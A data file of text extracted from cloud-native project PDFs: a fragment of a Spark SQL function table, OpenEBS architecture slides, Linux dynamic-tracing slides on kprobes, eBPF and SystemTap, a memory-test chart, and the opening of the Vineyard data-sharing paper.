struct<collect_list(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectList | collectlist | SELECT collectlist(col) FROM VALUES (1), (2), (1) AS tab(col) | struct<collect_list(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.CollectSet | collectset | SELECT collectset(col) FROM VALUES (1), (2), (1) AS tab(col) | struct<collect_set(col):array<int>> | | org.apache.spark.sql.catalyst.expressions.aggregate.Corr | corr | SELECT corr(c1, c2) FROM VALUES (3, 2), (3, 3), (6, 4) as tab(c1, c2) | struct<corr(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Count | count | SELECT count(*) FROM VALUES (NULL), (5), (5), (20) AS tab(col) | struct<count(1):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.CountIf | countif | SELECT countif(col % 2 = 0) FROM VALUES (NULL), (0), (1), (2), (3) AS tab(col) | struct<count_if(((col % 2) = 0)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.CountMinSketchAggExpressionBuilder | countminsketch | SELECT hex(countminsketch(col, 0.5d, 0.5d, 1)) FROM VALUES (1), (2), (1) AS tab(col) | struct<hex(countminsketch(col, 0.5, 0.5, 1)):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.CovPopulation | covarpop | SELECT covarpop(c1, c2) FROM VALUES (1,1), (2,2), (3,3) AS tab(c1, c2) | struct<covar_pop(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.CovSample | covarsamp | SELECT covarsamp(c1, c2) FROM VALUES (1,1), (2,2), (3,3) AS tab(c1, c2) | struct<covar_samp(c1, c2):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.First | first | SELECT first(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<first(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.First | firstvalue | SELECT firstvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<first_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.HistogramNumeric | histogramnumeric | SELECT histogramnumeric(col, 5) FROM VALUES (0), (1), (2), (10) AS tab(col) | struct<histogram_numeric(col, 5):array<struct<x:int,y:double>>> | | org.apache.spark.sql.catalyst.expressions.aggregate.HllSketchAgg | hllsketchagg | SELECT hllsketchestimate(hllsketchagg(col, 12)) FROM VALUES (1), (1), (2), (2), (3) tab(col) | struct<hllsketchestimate(hllsketchagg(col, 12)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.HllUnionAgg | hllunionagg | SELECT hllsketchestimate(hllunionagg(sketch, true)) FROM (SELECT hllsketchagg(col) as sketch FROM VALUES (1) tab(col) UNION ALL SELECT hllsketchagg(col, 20) as sketch FROM VALUES (1) tab(col)) | struct<hllsketchestimate(hllunionagg(sketch, true)):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.HyperLogLogPlusPlus | approxcountdistinct | SELECT approxcountdistinct(col1) FROM VALUES (1), (1), (2), (2), (3) tab(col1) | struct<approxcountdistinct(col1):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.Kurtosis | kurtosis | SELECT kurtosis(col) FROM VALUES (-10), (-20), (100), (1000) AS tab(col) | struct<kurtosis(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Last | last | SELECT last(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<last(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Last | lastvalue | SELECT lastvalue(col) FROM VALUES (10), (5), (20) AS tab(col) | struct<last_value(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Max | max | SELECT max(col) FROM VALUES (10), (50), (20) AS tab(col) | struct<max(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.MaxBy | maxby | SELECT maxby(x, y) FROM VALUES ('a', 10), ('b', 50), ('c', 20) AS tab(x, y) | struct<max_by(x, y):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.Median | median | SELECT median(col) FROM VALUES (0), (10) AS tab(col) | struct<median(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Min | min | SELECT min(col) FROM VALUES (10), (-1), (20) AS tab(col) | struct<min(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.MinBy | minby | SELECT minby(x, y) FROM VALUES ('a', 10), ('b', 50), ('c', 20) AS tab(x, y) | struct<min_by(x, y):string> | | org.apache.spark.sql.catalyst.expressions.aggregate.ModeBuilder | mode | SELECT mode(col) FROM VALUES (0), (10), (10) AS tab(col) | struct<mode(col):int> | | org.apache.spark.sql.catalyst.expressions.aggregate.Percentile | percentile | SELECT percentile(col, 0.3) FROM VALUES (0), (10) AS tab(col) | struct<percentile(col, 0.3, 1):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.PercentileContBuilder | percentilecont | SELECT percentilecont(0.25) WITHIN GROUP (ORDER BY col) FROM VALUES (0), (10) AS tab(col) | struct<percentile_cont(0.25) WITHIN GROUP (ORDER BY col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.PercentileDiscBuilder | percentiledisc | SELECT percentiledisc(0.25) WITHIN GROUP (ORDER BY col) FROM VALUES (0), (10) AS tab(col) | struct<percentile_disc(0.25) WITHIN GROUP (ORDER BY col):double> | |" }, { "data": "| regravgx | SELECT regravgx(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_avgx(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrAvgY | regravgy | SELECT regravgy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_avgy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrCount | regrcount | SELECT regrcount(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_count(y, x):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrIntercept | regrintercept | SELECT regrintercept(y, x) FROM VALUES (1,1), (2,2), (3,3) AS tab(y, x) | struct<regr_intercept(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrR2 | regrr2 | SELECT regrr2(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_r2(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSXX | regrsxx | SELECT regrsxx(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_sxx(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSXY | regrsxy | SELECT regrsxy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_sxy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSYY | regrsyy | SELECT regrsyy(y, x) FROM VALUES (1, 2), (2, 2), (2, 3), (2, 4) AS tab(y, x) | struct<regr_syy(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.RegrSlope | regrslope | SELECT regrslope(y, x) FROM VALUES (1,1), (2,2), (3,3) AS tab(y, x) | struct<regr_slope(y, x):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Skewness | skewness | SELECT skewness(col) FROM VALUES (-10), (-20), (100), (1000) AS tab(col) | struct<skewness(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevPop | stddevpop | SELECT stddevpop(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev_pop(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | std | SELECT std(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<std(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | stddev | SELECT stddev(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.StddevSamp | stddevsamp | SELECT stddevsamp(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<stddev_samp(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.Sum | sum | SELECT sum(col) FROM VALUES (5), (10), (15) AS tab(col) | struct<sum(col):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.TryAverageExpressionBuilder | tryavg | SELECT tryavg(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<try_avg(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.TrySumExpressionBuilder | trysum | SELECT trysum(col) FROM VALUES (5), (10), (15) AS tab(col) | struct<try_sum(col):bigint> | | org.apache.spark.sql.catalyst.expressions.aggregate.VariancePop | varpop | SELECT varpop(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<var_pop(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.VarianceSamp | varsamp | SELECT varsamp(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<var_samp(col):double> | | org.apache.spark.sql.catalyst.expressions.aggregate.VarianceSamp | variance | SELECT variance(col) FROM VALUES (1), (2), (3) AS tab(col) | struct<variance(col):double> | | org.apache.spark.sql.catalyst.expressions.variant.IsVariantNull | isvariantnull | SELECT isvariantnull(parsejson('null')) | struct<isvariantnull(parsejson(null)):boolean> | | org.apache.spark.sql.catalyst.expressions.variant.ParseJsonExpressionBuilder | parsejson | SELECT parsejson('{\"a\":1,\"b\":0.8}') | struct<parse_json({\"a\":1,\"b\":0.8}):variant> | | org.apache.spark.sql.catalyst.expressions.variant.SchemaOfVariant | schemaofvariant | SELECT schemaofvariant(parsejson('null')) | struct<schemaofvariant(parsejson(null)):string> | | org.apache.spark.sql.catalyst.expressions.variant.SchemaOfVariantAgg | schemaofvariantagg | SELECT schemaofvariantagg(parsejson(j)) FROM VALUES ('1'), ('2'), ('3') AS tab(j) | struct<schemaofvariantagg(parse_json(j)):string> | | org.apache.spark.sql.catalyst.expressions.variant.TryParseJsonExpressionBuilder | tryparsejson | SELECT tryparsejson('{\"a\":1,\"b\":0.8}') | struct<tryparsejson({\"a\":1,\"b\":0.8}):variant> | | org.apache.spark.sql.catalyst.expressions.variant.TryVariantGetExpressionBuilder | tryvariantget | SELECT tryvariantget(parsejson('{\"a\": 1}'), '$.a', 'int') | struct<tryvariantget(parsejson({\"a\": 1}), $.a):int> | | org.apache.spark.sql.catalyst.expressions.variant.VariantGetExpressionBuilder | variantget | SELECT variantget(parsejson('{\"a\": 1}'), '$.a', 'int') | struct<variantget(parse_json({\"a\": 1}), $.a):int> | | org.apache.spark.sql.catalyst.expressions.xml.XPathBoolean | xpathboolean | SELECT xpathboolean('<a><b>1</b></a>','a/b') | struct<xpath_boolean(<a><b>1</b></a>, a/b):boolean> | | org.apache.spark.sql.catalyst.expressions.xml.XPathDouble | xpathdouble | SELECT xpathdouble('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_double(<a><b>1</b><b>2</b></a>, sum(a/b)):double> | | org.apache.spark.sql.catalyst.expressions.xml.XPathDouble | xpathnumber | SELECT xpathnumber('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_number(<a><b>1</b><b>2</b></a>, sum(a/b)):double> | | org.apache.spark.sql.catalyst.expressions.xml.XPathFloat | xpathfloat | SELECT xpathfloat('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_float(<a><b>1</b><b>2</b></a>, sum(a/b)):float> | | org.apache.spark.sql.catalyst.expressions.xml.XPathInt | xpathint | SELECT xpathint('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_int(<a><b>1</b><b>2</b></a>, sum(a/b)):int> | | org.apache.spark.sql.catalyst.expressions.xml.XPathList | xpath | SELECT xpath('<a><b>b1</b><b>b2</b><b>b3</b><c>c1</c><c>c2</c></a>','a/b/text()') | struct<xpath(<a><b>b1</b><b>b2</b><b>b3</b><c>c1</c><c>c2</c></a>, a/b/text()):array<string>> | | org.apache.spark.sql.catalyst.expressions.xml.XPathLong | xpathlong | SELECT xpathlong('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_long(<a><b>1</b><b>2</b></a>, sum(a/b)):bigint> | | org.apache.spark.sql.catalyst.expressions.xml.XPathShort | xpathshort | SELECT xpathshort('<a><b>1</b><b>2</b></a>', 'sum(a/b)') | struct<xpath_short(<a><b>1</b><b>2</b></a>, sum(a/b)):smallint> | | org.apache.spark.sql.catalyst.expressions.xml.XPathString | xpathstring | SELECT xpathstring('<a><b>b</b><c>cc</c></a>','a/c') | struct<xpath_string(<a><b>b</b><c>cc</c></a>, a/c):string> |" } ]
{ "category": "Runtime", "file_name": "Zenko_hi-level.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "GUI\nCLIZenkoAWS\nGCP\nAzureRING\nGCP XML APIS3 API\nAzure Storage APIS3 API\nS3 API" } ]
{ "category": "Runtime", "file_name": "OpenEBS Architecture and Design.pdf", "project_name": "OpenEBS", "subcategory": "Cloud Native Storage" }
[ { "data": "v0.6 \nFebruary 28, 2018 \nArchitecture and Design \nPrerequisites \n●Kubernetes Concepts : Namespaces, RBAC,CRD, Taints & Tolerations, Pod Anti \nAffinity, etc., \n●Kubernetes Storage Concepts: Running Stateful Workloads via PV, PVC, \nStorage Classes and Dynamic Provisioner \n●Kubernetes and CNCF Management Tools: Kube Dashboard, Prometheus, \nGrafana, Opentracing & Jaeger \n●Kubernetes Incubator Projects: Node Exporter, Node Problem Detector \n●Storage optimized for Containerized Applications \n●Stable, Secure and Scalable - Horizontally scalable to millions of Containers, Fault \ntolerant and Secure by default \n●Seamless integration into any private and public cloud environments. Vendor \nindependent. \n●Non-disruptive software upgrades \n●Easy to setup. Low entry barrier. Developer and Operators Friendly. \nDesign Goals and Constraints Persistent Volume Categories \nApp\nPVK8s Node \nApp\nPVApp\nPV\nStorage Server Vol Vol VolFilesystem / BlockDev NAS \nK8s Node \nApp\nPV\nVol VolApp\nPV\nVolApp\nPV\nFilesystem / BlockDev DAS \nK8s Node \nApp\nPVApp\nPVApp\nPV\nVol Vol Vol\nFilesystem / BlockDev CAS \nNAS - Network Attached Storage (Example: GPD, EBS, Storage Appliances) \nDAS - Direct Attached Storage (Example: hostDir, Local PV) \nCAS - Container Attached Storage (Example: OpenEBS) \nIndicates functionality like replication, snapshots, encryption, compression, etc. Represent stateful Pods like Databases, etc. Container Attached Storage \nK8s Node \nApp\nPVApp\nPVApp\nPV\nVol Vol Vol\nFilesystem / BlockDev CAS ○Storage Controllers (Targets) are running in \ncontainers. \n○These Storage Containers are orchestrated by \nKubernetes, just like any other workloads. \n●Installation and Upgrades \n●Monitoring \n●Debuggability \n○Storage Containers are mainly dealing with: \n●Disk/Storage Management \n●Data - High Availability and \n●Data - Protection \n“OpenEBS is a CAS solution, that provides storage as a service to stateful workloads. \nOpenEBS hooks-into and extends the capabilities of Kubernetes to orchestrate \nstorage services (workloads)” Kubernetes Cluster node2 \nFilesystem / BlockDev \nnode1 \nFilesystem / BlockDev Using OpenEBS Volumes \nPod\nStateful Workload \n(DB, etc) \nov-ctrl \n(iSCSI Target) \nov-rep-1 \n(replica) ov-rep-2 \n(replica) OpenEBS Volume \nSetup OpenEBS \n(StorageClasses \nStoragePools, Disks) Application \n(Deployment, PVC) \n(iSCSI PV) \n(iSCSI Initiator) OpenEBS Components \nKubernetes Cluster kube-dashboard Cluster \nAdmin \nkube-apiserver \nkube-heapster kube-etcd \nprometheus-maya grafana-maya \nmaya-apiserver kubelet (n) \nmaya-provisioner maya-nodebot (n) node_exporter (n) OpenEBS SC and CRD (StoragePools, VolumePolicies) (DaemonSets) \nThe source code for the control plane components is located in mainly openebs/maya repository. Developer \nor User \n(Deploy \nWorkload) \nOpenEBS PVCs *OV Pods (m) *Workloads(m) Node Storage Management \nK8s-node can be configured with Persistent Storage \nas:\n- Additional space on OS directory \n- NVMe Disks \n- SSD Disks \n- SAS Disks \n- SAN/NAS volumes \n- Object Store mounts \nOpenEBS Volume Replica ( OV Replica ) is a container \nrunning within a K8s Pod. OV Replica will be granted \naccess to local storage on the K8s-node using Local PV \nOptions like: \n- hostDir \n- Block Disks by mounting (/dev) * \n \nOpenEBS Control Plane manages the discovery, \nallocation to the OV Replica’s and monitoring of the \nstorage attached to the node. \n*https://github.com/kubernetes/kubernetes/issues/58569 \n*https://docs.google.com/document/d/1fG-KwUQNsuPYY40By\noBFqKJKpxzgyk7cQ5gqsGRXxfk/edit \nOV Replica \nPV(s) \nk8s-node \nConfig \nMapOpenEBS - CRDs (extended Schema) \nOpenEBS Control Plane uses Kubernetes etcd cluster to store the configuration information about \nOpenEBS related objects. \nWhile K8s primitives like PV, PVC, SC are used, they can in-turn refer to OpenEBS specific objects for \nfurther details. \nSome of the OpenEBS objects (CRDs) created by the OpenEBS Operator are: \n-Persistent Disk \n-Storage Pool \n-Storage Pool Claim \n-Persistent Volume Policy \nIn addition to the above generic CRDs used by the openebs control plane, there can be custom CRDs \nspecific to the Storage Engines like cStor: \n-cStorPool \n-cStorVolume \nStorage Schema - PersistentDisk \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods Storage Schema - StoragePools \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods maya-cstor\n-operator \nSPC(s) \nfile/block SP(s) \n(type=file) cStor Pool \nSP(s) \n(type=block) Storage Schema - OpenEBS Volumes \n(Replicas) \nNVMe SSD \n SAS Disks HostDir SAN/NAS S3 \n NVDIMM SSDs \nPersistentDisk (PD), \nlogical representation \nof the underlying \nstorage attached to a \nnode. K8s node \nPD(s) kube-etcd maya-nodebot \nnode-problem-detector DaemonSets/System Pods maya-cstor\n-operator \nSPC(s) \nfile/block SP(s) \n(type=file) cStor Pool \nSP(s) \n(type=block) OV Replica \n(jiva) \nPV\n(hostdir) OV Replica \n(block) OV Ctrl \n(jiva) OV Ctrl \n(cStor) maya-nodebot \nAPIs (https / gRPC) \nCollector \nDiscoverer Provisioner Monitor CLI (COBRA) \nkube-etcd prometheus-maya \nOS Utilities / Daemons kube custom controller and etcd cachestor Metrics Maya-nodebot runs on \neach node as a \ndaemon-set. \nHas access to the \nunderlying disk subsystem \nand can handle the disk \nadd/lost events and can \nmonitor for disk errors. \nDisk details and status \n(lost/deleted/healthy) are \nupdated as CR into the \netcd. \nDisks are monitored for IO \nstats and smart and \nmetrics can be collected \nvia prometheus. \nWhen critical events are \nobserved (say disk lost \nfrom an active pool) calls \nmaya-apiserver for \nhandling or can call the \nReplica impacted. maya-apiserver \nAPIs (https / gRPC) \nOV Provisioner CLI (COBRA) \nkube-etcd \nK8s Orchestrator Provider maya-provisioner \nkube-apiserver OV Snapshots \nOV Metrics OV Profiles \nmaya-mulebot \nOV (replica) OV (target) prometheus-maya maya-provisioner \nAPIs (https / gRPC) \nCreate CLI (COBRA) \nkube-etcd \nK8s Dynamic Controller maya-apiserver \nkube-apiserver Metrics Update Delete prometheus-maya maya-volume-exporter \nAPIs (https / gRPC) \nCollector CLI (COBRA) \nprometheus-maya OpenEBS Volume Exporter grafana-maya maya-mulebot (TBD) State Diagrams \nOpenEBS Volume - State Diagram \ndoes-not-exist initializing running deleting \nerrored degraded \noffline migrating Sequence Diagrams \n(TBD) \nUI \n(Kubernetes \nDashboard) \nTODO - Could list OpenEBS Volumes created using this Storage class Should include outstanding alerts at the top of the page. Storage: \navail/used \nOn each \npod. \nShould include Events at the bottom of the page. " } ]
{ "category": "Runtime", "file_name": "mem-test.pdf", "project_name": "Kuasar", "subcategory": "Container Runtime" }
[ { "data": " 0 200 400 600 800 1000\n 0 10 20 30 40 50Pss(MB)\nNumber of PodsKata\nKuasar" } ]
{ "category": "Runtime", "file_name": "systemtap-and-go.pdf", "project_name": "OpenEBS", "subcategory": "Cloud Native Storage" }
[ { "data": "Dynamic \nInstrumentation\n@JeffryMolanus @openebsGolang Meetup Bangalore XXIV\n15 July 2017Tracing\n•To record information about a programs execution\n•Useful for understanding code, in particular a very large code base\n•Used during debugging, statistics, so on and so forth\n•Dynamic tracing is the ability to ad -hoc add or remove certain instrumentation without \nmaking changes to the code that is subject to tracing or restarting the program or system\n•In general, tracing should not effect the stability of the program that is being traced in \nproduction, during development its less of importance\n•When no tracing is enabled there should be no overhead; when enabled the overhead \ndepends on what is traced and how \n•User land tracing requires abilities in kernel (which is the focus of this talk)\n•user space tracing has a little more overhead due to the induced context switchTracers on other platforms\n•Illumos/Solaris and FreeBSD\n•Dtrace, very powerful and production safe used for many years\n•Compressed Type Format (CTF) data is available in binaries and libraries, no \nneed for debug symbols to work with the types\n•Solaris uses the same CTF data for type information for debugging\n•Event Tracing for Windows (EWT)\n•Linux\n•Requires debug symbols to be downloaded depending on what you trace and how \nspecific you want to trace\n•With DWARF data more can be done then with plain CTF howeverBasic architecture of tracing\n•There are generally, two parts of tracing in Linux\n•Frontend tools to work/consume with/the in kernel tracing \nfacilities\n•We will look briefly in ftrace, systemtap and BCC \n•Backend subsystems\n•Kernel code that executes what ever code you want to be \nexecuted on entering the probes function or address\n•kprobes, probes, tracepoints, sysdigftrace\n•Tracepoints ; static probes defined in the kernel that can be enabled at \nrun time\n•ABI is kept stable by kernel \n•static implies you have to know what you want to trace while \ndeveloping the code\n•Makes use of sysfs interface to interact with it \n•Several wrappers exist to make things a little easier\n•tracecmd and kernelshark (UI)\n•Also check the excellent stuff from Brendan GreggAdding a tracepoint\nTrace points in sysfs\nkernelshark\nkprobes\n•kprobes is defined in multiple sub categories\n•jprobes : trace function entry (optimised for function entry, copy stack)\n•kretprobes : trace function return \n•kprobes : trace at any arbitrary instruction in the kernel\n•To use it one has to write a kernel module which needs to be loaded at run \ntime\n•this is not guaranteed to be safe\n•A kprobe replaces the traced instruction with a break point instruction\n•On entry, the pre_handler is called after instrumenting, the post handlerkprobes\nKprobe example\nKprobe example\njprobes\n•Note: function \nprototype needs to \nmatch the actual \nsyscall\nutrace/uprobes\n•Roughly the the same as the kprobe facility in the kernel but focused \non user land tracing\n•current ptrace() in linux is implemented using the utrace frame work\n•tools like strace and GDB use ptrace()\n•Allows for more sophisticated tooling, one of which is uprobes\n•Trace points are placed on the an inode:offset tuple\n•All binaries that map that address will have a SW breakpoint \ninjected at that addressftrace & user space\n•The same ftrace interface is available for working with uprobes\n•Behind the scene the kernel does the right thing (e.g use kprobe, \ntracepoints, or uprobes)\n•The same sysfs interface is used, general work flow:\n•Find address to place the probe on\n•Enable probing\n•Disable probing\n•View results (flight recorder)eBPF\n•Pretty sure everyone here has used \nBPF likely with out knowing\n•tcpdump uses BPF\n•eBPF is enhanced BPF\n•sandboxed byte code executed by \nkernel which is safe and user \ndefined\n•attach eBPF to kprobes and \nuprobes\n•certain restrictions in abilities\nBCC\n•BPF Compiler Collection, \ncompiles code for the in kernel \nVM to be executed\n•Several high level wrappers for \nPython, lua and GO\n•Code is still written in C \nhowever\nRecap\n•Several back -end tracing capabilities in the kernel\n•Tracepoints, kprobes, jprobes, kretprobes and uprobes\n•eBPF allows attachment to kprobe, uprobes and tracepoints for \nsafe execution \n•Linux tracing world can use better generic frontends for adhoc \ntracing\n•Best today are perf and systemtap (IMHO)\n•Who wants to write C when you want to print a member of a \ncomplex struct? (ply)Systemtap\n•High level scripting language to work with the aforementioned tracing \ncapabilities of Linux\n•Flexible as it allows for writing scripts that can trace specific lines \nwithin a file (debug symbols)\n•Next to tracing, it can also make changes to running programs when \nrun in “guru mode”\n•Resulting scripts from systemtap are kernel modules that are loaded \nin to the kernel (kprobe and uprobes)\n•Adding a eBPF target is in the works as currently, systemtap may \nresult in unremovable modules or sudden death of traced processesstp files\n•Example script oneliner: \n•stap -e ‘probe syscall.open { printf(“exec %s, file%s, execname(), \nfilename) }’\n•stap -L ‘syscall.open'\n•syscall.open: __nr:long name:string filename:string flags:long \nflags_str:string mode:long argstr:string\n•List user space functions in process “trace”\n•stap -L ‘process(“./trace\").function(\"*\")'\n•.call and .return probes for each function List probes\nTracing line numbers\n•What's the value of ret after \nline 35?\n•Could be done by tracing ret \nvalues, but that is not the \npurpose of this exercise\n•gcc -g -O0 \n•full debug info\nTracing line number\n•.statement(“main@code/talk/trace.c:36”) { … }\nUnderstanding code flow\nUnderstanding code flow\nDownstack\n•All functions \nbeing called by \na function\nTracing go\nCant trace return values\nCalling convention\n•AMD64 calling conventions\n•RDI, RSI, RDX, RCX, R8 and R9\n•Go is based on PLAN9 which uses a different approach therefore tracing does not work as \nwell as one would like it to be (yet)\n•This also goes for debuggers\n•Perhaps Go will start using the X86_64 ABI as it moves forward or all tools and debuggers \nwill add specific PLAN9 support\n•https://go -review.googlesource.com/#/c/28832/ (ABI change?)\n•GO bindings to the BCC tool chain\n•Allows for creating eBPF tracing tools written in go\n•but still requires writing the actual trace logic in CSummary\n•Dynamic tracing is an invaluable tool for \nunderstanding code flow\n•To verify hypotheses around software bugs or \nunderstanding\n•Ability to make changes to code on the fly with out \nrecompiling (guru mode)\n•Under constant development most noticeable the \neBPF/BCC work" } ]
{ "category": "Runtime", "file_name": "vineyard-sigmod-2023.pdf", "project_name": "Vineyard", "subcategory": "Cloud Native Storage" }
[ { "data": "200Vineyard: Optimizing Data Sharing in Data-Intensive\nAnalytics\nWENYUAN YU, Alibaba Group, China\nTAO HE, Alibaba Group, China\nLEI WANG, Alibaba Group, China\nKE MENG, Alibaba Group, China\nYE CAO, Alibaba Group, China\nDIWEN ZHU, Alibaba Group, China\nSANHONG LI, Alibaba Group, China\nJINGREN ZHOU, Alibaba Group, China\nModern data analytics and AI jobs become increasingly complex and involve multiple tasks performed on\nspecialized systems. Sharing of intermediate data between different systems is often a significant bottleneck in\nsuch jobs. When the intermediate data is large, it is mostly exchanged through filesin standard formats ( e.g.,\nCSV and ORC), causing high I/O and (de)serialization overheads. To solve these problems, we develop Vineyard ,\na high-performance, extensible, and cloud-native object store, trying to provide an intuitive experience for\nusers to share data across systems in complex real-life workflows. Since different systems usually work on data\nstructures ( e.g.,dataframes, graphs, hashmaps) with similar interfaces, and their computation logic is often\nloosely-coupled with how such interfaces are implemented over specific memory layouts, it enables Vineyard\nto conduct data sharing efficiently at a high level via memory mapping and method sharing. Vineyard provides\nan IDL named VCDL to facilitate users to register their own intermediate data types into Vineyard such that\nobjects of the registered types can then be efficiently shared across systems in a polyglot workflow. As a\ncloud-native system, Vineyard is designed to work closely with Kubernetes, as well as achieve fault-tolerance\nand high performance in production environments. Evaluations on real-life datasets and data analytics jobs\nshow that the above optimizations of Vineyard can significantly improve the end-to-end performance of data\nanalytics jobs, by reducing their data-sharing time up to 68.4 ×.\nCCS Concepts: •Computer systems organization →Cloud computing ;•Theory of computation →\nData exchange ;•Information systems →Key-value stores .\nAdditional Key Words and Phrases: data sharing, in-memory object store\nACM Reference Format:\nWenyuan Yu, Tao He, Lei Wang, Ke Meng, Ye Cao, Diwen Zhu, Sanhong Li, and Jingren Zhou. 2023. Vineyard:\nOptimizing Data Sharing in Data-Intensive Analytics. Proc. ACM Manag. Data 1, 2, Article 200 (June 2023),\n27 pages. https://doi.org/10.1145/3589780\nAuthors’ addresses: Wenyuan Yu, Alibaba Group, China, Beijing; Tao He, Alibaba Group, China, Beijing; Lei Wang, Alibaba\nGroup, China, Beijing; Ke Meng, Alibaba Group, China, Beijing; Ye Cao, Alibaba Group, China, Beijing; Diwen Zhu, Alibaba\nGroup, China, Shanghai; Sanhong Li, Alibaba Group, China, Shanghai; Jingren Zhou, Alibaba Group, China, Hangzhou,\nvineyard@alibaba-inc.com.\nPermission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee\nprovided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the\nfull citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored.\nAbstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires\nprior specific permission and/or a fee. Request permissions from permissions@acm.org.\n©2023 Copyright held by the owner/author(s). Publication rights licensed to ACM.\n2836-6573/2023/6-ART200 $15.00\nhttps://doi.org/10.1145/3589780\nProc. ACM Manag. Data, Vol. 1, No. 2, Article 200. Publication date: June 2023.200:2 Wenyuan Yu et al.\nFraud Label \nPropagation \n(Graph: libgrape-lite) Fraud User \nClassifier Training \n(NN: PyTorch) \nCSV/TSV/ORC Files on External Storage (e.g., Alluxio, S3, HDFS) User Filtering \n/ Feature Join \n(SQL /gid29/gid3 Pandas) ETL / Graph \nGeneration \n(SQL /gid29/gid3 Pandas) Raw Logs \nBarrier Barrier Barrier Workloads … Workloads …\nFig. 1. A Real-life Fraud Detection Job.\n1 INTRODUCTION\nData-intensive computing is a typical class of big data analytics applications, and most of their\nprocessing time is devoted to I/O and data movement and manipulation [ 4,48]. Recent stud-\nies [25,36,51] have reported that many jobs submitted to cloud platforms fall into this category.\nIn addition, there is an increasingly new trend where multiple tasks belonging to different types of\nworkloads are fused together to form a single complex job (workflow) [ 41,61,64]. Figure 1 depicts a\nreal-life fraud detection job from Alibaba [ 23], in which diverse kinds of workloads ( e.g.,SQL, graph\nprocessing, and deep learning) are involved. Consequently, handling such complex data-intensive\njobs efficiently is highly desired.\nIn response, two practical solutions have been proposed, namely single-system andmulti-\nsystem , but both of them still leave large room for improvement. The single-system copes with\ndiverse workloads in a single general-purpose system like Spark [ 63,64]. Unfortunately, a workload\nimplemented in general-purpose systems often performs worse than that in workload-specific\nsystems, which are tailored for a particular type of workload. Workload-specific systems ( e.g.,\nGemini [ 67] for graph processing) adopt specialized data structures ( e.g.,CSR/CSC for graphs) and\noptimizations in their execution engines to offer superior performance. Sometimes, the performance\ngap 